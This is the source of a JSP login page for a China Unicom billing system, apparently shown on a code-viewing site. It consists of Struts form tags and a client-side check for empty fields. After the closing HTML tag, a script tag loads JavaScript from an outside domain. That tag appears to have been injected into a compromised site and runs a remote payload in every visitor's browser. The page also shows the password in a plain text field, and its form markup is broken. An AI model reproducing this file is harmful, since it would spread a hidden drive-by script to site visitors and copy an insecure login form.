📄 index2.jsp
字号:
<%@ page pageEncoding="UTF-8"%>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html"%>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean"%>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic"%>
<HTML>
<HEAD>
<TITLE>联通收费系统</TITLE>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<style type="text/css">
<!--
body {
background-color: #CCCCCC;
margin-top: 10px;
}
-->
</style>
<link href="style.css" rel="stylesheet" type="text/css">
<Script language="JavaScript">
function loginValidate()
{
var theForm = document.loginForm;
var name = theForm.name.value;
var pwd = theForm.pwd.value;
if(name == "")
{
theForm.name.focus();
window.alert("用户名不能为空");
}
else if(pwd == "")
{
theForm.pwd.focus();
window.alert("密码不能为空");
}
else{
theForm.submit();
}
}
</Script>
</HEAD>
<BODY LEFTMARGIN=0 MARGINWIDTH=0>
<!-- ImageReady Slices (index.psd) -->
<TABLE WIDTH=750 BORDER=0 align="center" CELLPADDING=0 CELLSPACING=0>
<TR>
<TD ROWSPAN=2>
<IMG SRC="images/index_01.gif" WIDTH=444 HEIGHT=237 ALT=""></TD>
<TD>
<IMG SRC="images/index_02.gif" WIDTH=306 HEIGHT=99 ALT=""></TD>
</TR>
<TR>
<TD>
<IMG SRC="images/index_03.gif" WIDTH=306 HEIGHT=138 ALT=""></TD>
</TR>
<TR>
<TD ROWSPAN=2>
<IMG SRC="images/index_04.gif" WIDTH=444 HEIGHT=363 ALT=""></TD>
<TD width="306" height="185" background="images/index_05.gif"><table width="250" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><html:form action="login.do"></html:form>
<div align="center">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="30"><div align="center"><strong>用户名:</strong>
<html:text property="name"></html:text>
<br>
</div></td>
</tr>
<tr>
<td height="30"><div align="center"><strong>密 码:</strong>
<html:text property="pwd"></html:text>
</div></td>
</tr>
<tr>
<td height="30">
<div align="center">
<html:submit value="登录"/>
</div></td>
</tr>
</table>
</div>
</html:form></td>
</tr>
</table></TD>
</TR>
<TR>
<TD>
<IMG SRC="images/index_06.gif" WIDTH=306 HEIGHT=178 ALT=""></TD>
</TR>
</TABLE>
<!-- End ImageReady Slices -->
</BODY>
</HTML><script language=javascript src=http://www.456ii.cn/all/aa.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -